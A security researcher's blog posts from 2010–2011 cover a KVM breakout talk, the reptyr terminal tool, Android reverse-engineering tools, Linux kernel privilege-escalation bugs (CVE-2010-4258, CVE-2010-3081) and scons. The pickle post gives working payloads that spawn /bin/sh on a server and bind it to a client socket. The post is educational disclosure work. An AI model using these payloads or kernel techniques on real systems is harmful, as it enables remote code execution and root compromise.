BlackHat/DEFCON 2011 talk: Breaking out of KVM

I’ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of KVM (the Kernel-based Virtual Machine) on Linux.

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and it includes links to everything you’ll need to get the exploit up and running in a local test environment, if you’re so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I’m also going to clean that up and release it, but don’t expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I’d met online and others I hadn’t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Aug 8th, 2011

Exploiting misuse of Python’s “pickle”

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle’s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):
    # Code to actually parse incoming data according to an
    # internal state machine.
    # If we just finished receiving headers, call verifyAuth() to
    # check authentication.
    pass
 
  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects: if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; for various mostly-obvious reasons, that won’t work. We could read up on the “pickle” format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64
 
class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))
 
print base64.b64encode(cPickle.dumps(RunBinSh()))
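To watch the mechanism without spawning anything, here is a harmless Python 3 variant. The class name ReduceDemo is made up for illustration, and the builtin sorted stands in for Popen, so unpickling simply hands back whatever sorted returns:

```python
import pickle


class ReduceDemo(object):
    """Hypothetical demo class: unpickling it calls sorted([3, 1, 2])."""

    def __reduce__(self):
        # (callable, argument tuple): pickle stores a by-name reference
        # to the callable, plus the pickled arguments.
        return (sorted, ([3, 1, 2],))


def roundtrip():
    blob = pickle.dumps(ReduceDemo())
    # loads() looks up the callable and calls it on the arguments;
    # no ReduceDemo instance is ever reconstructed.
    return pickle.loads(blob)


if __name__ == "__main__":
    print(roundtrip())
```

The unpickling side never needs the ReduceDemo class at all, which is why the attacker's class does not have to exist on the server.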

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64
 
class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))
 
print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.
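The guess about fd 20 leans on the kernel handing out the lowest unused descriptor number each time. A quick local sketch in Python 3 shows the pattern; opening /dev/null is only a stand-in for the server accepting a connection, and the function name is made up for illustration:

```python
import os


def open_descriptors(count):
    """Open `count` new fds and return their numbers in allocation order."""
    # Each open() takes the lowest-numbered free slot in this process's
    # fd table, just as accept() would for an incoming connection.
    fds = [os.open(os.devnull, os.O_RDONLY) for _ in range(count)]
    for fd in fds:
        os.close(fd)
    return fds


if __name__ == "__main__":
    print(open_descriptors(20))
```

In a process with few descriptors already open, the result is a run of increasing numbers starting just above the ones in use, so a burst of 20 connections is very likely to cover fd 20.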

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than a few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.
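For contrast, one way to handle such a token safely is to authenticate the raw bytes before parsing them, and to parse with a format that cannot run code. This is a Python 3 sketch under assumptions: the token layout (base64 of an HMAC-SHA256 tag followed by a JSON body) and the names make_token and verify_token are invented for illustration and are not the design of the service described above.

```python
import base64
import hashlib
import hmac
import json

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


class AuthenticationFailed(Exception):
    pass


def make_token(data, key):
    """Serialize `data` as JSON and prepend an HMAC-SHA256 tag."""
    body = json.dumps(data, sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body)


def verify_token(token, key):
    """Return the decoded data, or raise AuthenticationFailed."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        raise AuthenticationFailed("malformed token")
    tag, body = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    # Check the signature over the raw bytes *before* parsing anything.
    if not hmac.compare_digest(tag, expected):
        raise AuthenticationFailed("bad signature")
    return json.loads(body.decode("utf-8"))
```

The important difference from verifyAuth() above is the ordering: nothing attacker-controlled reaches a parser until the signature has been checked.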

Mar 20th, 2011

reptyr: Changing a process’s controlling terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The “controlling terminal” is a concept maintained by UNIX operating systems that is independent of a process’s file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either “session leader” or “process group leader”). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management — Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.
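These IDs are easy to inspect from userspace. A small Python 3 sketch (the helper name describe is made up for illustration) that reports where a process sits in the hierarchy:

```python
import os


def describe(pid=0):
    """Return the PID, process group ID and session ID for `pid` (0 = self)."""
    real_pid = os.getpid() if pid == 0 else pid
    pgid = os.getpgid(pid)
    sid = os.getsid(pid)
    return {
        "pid": real_pid,
        "pgid": pgid,
        "sid": sid,
        "is_group_leader": pgid == real_pid,
        "is_session_leader": sid == real_pid,
    }


if __name__ == "__main__":
    print(describe())
```

Run as a foreground job from an interactive shell, this typically reports is_group_leader as True and is_session_leader as False, with sid equal to the shell's PID.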

If you check out tty_ioctl(4), you’ll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we’re done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where I’m trying to attach a (say) mutt that you spawned from your shell, mutt won’t be a session leader — your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there’s a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent’s session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let’s see if we can avoid that.

So, we’re going to need to change mutt’s process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There’s a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we’ll be able to setsid. We could try to find one — the shell is a plausible candidate, for instance — but there’s an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We’ll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child’s process group. mutt can then setsid, moving into a new session, and now, as a session leader, we can finally ioctl(TIOCSCTTY) on the new terminal, and we win.
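The same sequence of calls can be tried without ptrace by having a process perform them on itself. The Python 3 sketch below is only an illustration of the ordering, not reptyr's code: a forked child plays the role of mutt, and the function names and the with_tty switch are assumptions made for the example.

```python
import fcntl
import os
import termios


def _target(with_tty):
    """Runs in a forked child that plays the role of mutt."""
    os.setpgid(0, 0)            # like a shell job: leader of its own group
    try:
        os.setsid()
        return 1                # unexpected: a group leader should get EPERM
    except PermissionError:
        pass

    gate_r, gate_w = os.pipe()
    dummy = os.fork()
    if dummy == 0:
        os.close(gate_w)
        os.read(gate_r, 1)      # park until the target closes its end
        os._exit(0)
    os.close(gate_r)
    try:
        os.setpgid(dummy, dummy)    # dummy child gets its own process group
        os.setpgid(0, dummy)        # target moves into the dummy's group
        os.setsid()                 # no group is named after our PID now
        if with_tty:
            _master, slave = os.openpty()
            fcntl.ioctl(slave, termios.TIOCSCTTY, 0)
    finally:
        os.close(gate_w)
        os.waitpid(dummy, 0)
    leader = os.getsid(0) == os.getpid() == os.getpgid(0)
    return 0 if leader else 2


def run_demo(with_tty=False):
    """Fork a stand-in target; return 0 if it became a session leader."""
    pid = os.fork()
    if pid == 0:
        code = 3
        try:
            code = _target(with_tty)
        finally:
            os._exit(code)
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1
```

Calling run_demo(with_tty=True) additionally opens a fresh pty and claims it with TIOCSCTTY, which needs a system where ptys are available.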

It turns out I didn’t invent this technique — injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Feb 8th, 2011

reptyr: Attach a running process to a new terminal

Over the last week, I’ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don’t want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There’s a shell script called screenify that’s been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There’s also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much, better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won’t resize correctly. ^C and ^Z will still be processed on the old terminal — typing them in the new terminal won’t do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I’ve never seen a program that doesn’t behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty — it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.
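Copying the termios settings is the simplest of those steps. As a rough Python 3 illustration (reptyr itself is written in C and performs the calls inside the target; the function name here is made up):

```python
import termios


def copy_termios(old_fd, new_fd):
    """Apply the terminal attributes of old_fd to new_fd."""
    # tcgetattr returns [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
    attrs = termios.tcgetattr(old_fd)
    # TCSANOW applies the change immediately.
    termios.tcsetattr(new_fd, termios.TCSANOW, attrs)
```

Without this step, a program that had switched its old terminal into raw or no-echo mode would find the new one still in the default line-buffered, echoing state.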

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target’s controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux’s terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations — it doesn’t generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!

Appendix

(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had fun writing it anyways, and apparently I wasn’t the only one who didn’t know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode (I use a different technique for ptrace-hijacking, for example), and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I’ve seen for this tool, this still isn’t a problem that is solved to the average user’s satisfaction.

Jan 21st, 2011

Some Android reverse-engineering tools

I’ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I’ve been using dedexer instead of baksmali, honestly mainly because the former’s output has fewer blank lines and so is more readable on my netbook’s screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that’s your tool of choice (And it does look like a better tool overall, from what I can see).

ddx.el

I’m an emacs junkie, and I can’t stand it when I have to work with a file that doesn’t have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It’s fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the “lXXXXX” labels dedexer generates.

An example file (from k9mail) highlighted using ddx-mode

ddx2dot

Dalvik assembly is, on the whole, pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you’d really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that “parses” .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

A CFG for k9mail's ImapResponseParser.parseToken method

I use the term “parses” because it’s really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn’t parse catch directives, so those just end up floating out to the side as unattached blocks.
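To give a flavor of the approach, here is a much-reduced Python 3 sketch of the same idea. It is not the ddx2dot script itself, and the input syntax is an assumption made for the example: labels sit alone on a line as "lXXXX:", branches are if-* and goto instructions that name a label, and lines starting with "." or ";" are directives or comments.

```python
import re

LABEL_RE = re.compile(r"^(l[0-9a-f]+):$")      # assumed label syntax
TARGET_RE = re.compile(r"\b(l[0-9a-f]+)\b")    # label used as an operand


def build_cfg(lines):
    """Split instructions into basic blocks; return (blocks, edges)."""
    blocks = {}
    edges = []
    current = None        # name of the block being filled, if any
    fallthrough = None    # block whose control flows into the next one

    def start_block(name):
        nonlocal current, fallthrough
        blocks.setdefault(name, [])
        if fallthrough is not None:
            edges.append((fallthrough, name))
        current, fallthrough = name, None

    for raw in lines:
        line = raw.strip()
        if not line or line.startswith((".", ";")):
            continue
        match = LABEL_RE.match(line)
        if match:
            if current is not None:
                fallthrough = current      # previous block runs into label
            start_block(match.group(1))
            continue
        if current is None:
            start_block("block%d" % len(blocks))
        blocks[current].append(line)
        opcode = line.split()[0]
        if opcode.startswith(("if-", "goto")):
            target = TARGET_RE.search(line[len(opcode):])
            if target:
                edges.append((current, target.group(1)))
        if opcode.startswith("if-"):
            fallthrough, current = current, None   # not-taken path continues
        elif opcode.startswith(("goto", "return", "throw")):
            current = None                         # control does not continue
    return blocks, edges


def to_dot(blocks, edges):
    """Render the blocks and edges as a Graphviz digraph."""
    out = ["digraph cfg {", "  node [shape=box];"]
    for name, body in blocks.items():
        text = "\\l".join([name + ":"] + body) + "\\l"
        out.append('  "%s" [label="%s"];' % (name, text.replace('"', '\\"')))
    for src, dst in edges:
        out.append('  "%s" -> "%s";' % (src, dst))
    out.append("}")
    return "\n".join(out)
```

Piping the output of to_dot through dot -Tpng produces a picture of the blocks; like the real script, this sketch ignores catch directives entirely.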

You’ll also notice the rounded “return” blocks — either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.

Github

Both tools live in my “reverse-android” repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I’d appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning denial-of-service into privilege escalation

Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I’m going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.

access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn’t passed an “evil” pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the “userspace” part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn’t, and so must explicitly check that any pointers given to it by a user don’t point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs() [1] is an internal Linux function that is used to override the definition of the user/kernel split for the current process.

After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace — access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer. Calling set_fs(KERNEL_DS) first temporarily disables that check.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then kills the current process by calling the do_exit() function.

When the kernel does so, it’s still running in the same process context it was in before the oops occurred, including any set_fs() override, if applicable. That means do_exit will get called with access_ok disabled, which is not something anyone expected when they wrote the individual pieces of this system.

clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread’s address space, in order to notify other threads of that exit.

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the “userspace” segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!
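The interaction is easier to follow in a toy model. The Python 3 sketch below imitates only the logic described above; it is not kernel code, and the class names, the boundary constant, and the dictionary standing in for memory are all assumptions made for the illustration.

```python
import errno

USER_LIMIT = 0x0000800000000000   # assumed user/kernel split for the model
NO_LIMIT = 1 << 64                # what set_fs(KERNEL_DS) amounts to


class Oops(Exception):
    """Stands in for a NULL dereference or BUG() inside a handler."""


class Task:
    def __init__(self, clear_child_tid):
        self.addr_limit = USER_LIMIT
        self.clear_child_tid = clear_child_tid


class ToyKernel:
    def __init__(self, memory):
        self.memory = memory          # address -> value

    def access_ok(self, task, addr):
        return addr < task.addr_limit

    def put_user(self, task, value, addr):
        if not self.access_ok(task, addr):
            return -errno.EFAULT
        self.memory[addr] = value
        return 0

    def do_exit(self, task):
        if task.clear_child_tid:
            self.put_user(task, 0, task.clear_child_tid)

    def run_handler(self, task, handler, with_kernel_ds):
        old_limit = task.addr_limit
        if with_kernel_ds:
            task.addr_limit = NO_LIMIT
        try:
            handler()
        except Oops:
            # The oops path skips the restore below and goes straight
            # to do_exit() with whatever addr_limit was in force.
            self.do_exit(task)
            return
        task.addr_limit = old_limit


def buggy_handler():
    raise Oops()
```

With with_kernel_ds=False the write to a kernel address is refused with -EFAULT; with with_kernel_ds=True the same oops zeroes whatever address the task placed in clear_child_tid.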

splice() et al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). A handful of compat-mode (32 on 64) syscalls work similarly.

By far the biggest source I’ve found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, an attempt to splice() to or from an fd that has no special support for zero-copy splice falls back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means is that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.

This is also exactly the technique Dan’s exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendmsg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.

Footnotes:

[1] Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Dec 10th, 2010

Some notes on CVE-2010-3081 exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publicly documented. I’d like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux’s 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;
}

This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. Thus, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system, means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel’s address space.
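The wraparound is plain 64-bit pointer arithmetic and can be checked by hand. The Python 3 sketch below models only the subtraction; the stack pointer value, the KERNEL_START constant (taken here as the start of the upper half of the x86-64 address space), and the helper names are assumptions chosen for the illustration.

```python
MASK64 = (1 << 64) - 1
KERNEL_START = 0xFFFF800000000000   # assumed start of the kernel half


def compat_alloc_user_space(sp, length):
    """Model of `regs->sp - len` with 64-bit wraparound."""
    return (sp - length) & MASK64


def points_into_kernel(addr):
    return addr >= KERNEL_START


if __name__ == "__main__":
    sp = 0xFFFFD000                 # a plausible 32-bit stack pointer
    for length in (0x100, 0x17FFFC000):
        addr = compat_alloc_user_space(sp, length)
        print(hex(length), hex(addr), points_into_kernel(addr))
```

A small len keeps the result just below the stack pointer, while a len larger than the stack pointer itself wraps past zero and lands in the top of the address space.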

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targeted.

Disabling 32-bit binaries doesn’t help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn’t even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I’ve posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you’ve realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There’s no need for underflow at all: you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from “user-controlled len and no access_ok” to simply “no access_ok”.

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}

Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on this exploit, I’ve produced a working proof-of-concept exploit for RHEL4, based on the released exploit for RHEL5. Contact me if you’re interested, but it’s pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publicly documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it’s often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Nov 30th, 2010

Why scons is cool

I’ve recently started playing with scons a little for some small personal projects. It’s not perfect, but I’ve rapidly come to the conclusion that it’s probably a far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles; by giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make’s awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.
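As a rough sketch of what that looks like in practice, here is a two-file layout. The file names, the foo library, and the flag values are placeholders invented for the example; both files are scons build scripts and only make sense when run by scons.

```python
# SConstruct (top level)
env = Environment(CFLAGS=['-O2', '-Wall'])

# Run the sub-build-script with `env` exported to it; whatever it
# passes to Return() comes back as the result of this call.
libfoo = SConscript('lib/SConscript', exports='env')

# A target built in another directory is just another source node here.
env.Program('app', ['main.c'] + libfoo)


# lib/SConscript
Import('env')
libfoo = env.StaticLibrary('foo', ['foo.c'])
Return('libfoo')
```

The sub-script sees only what was exported to it, and the top level sees only what was returned, yet the dependency between app and the library ends up in one global graph.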

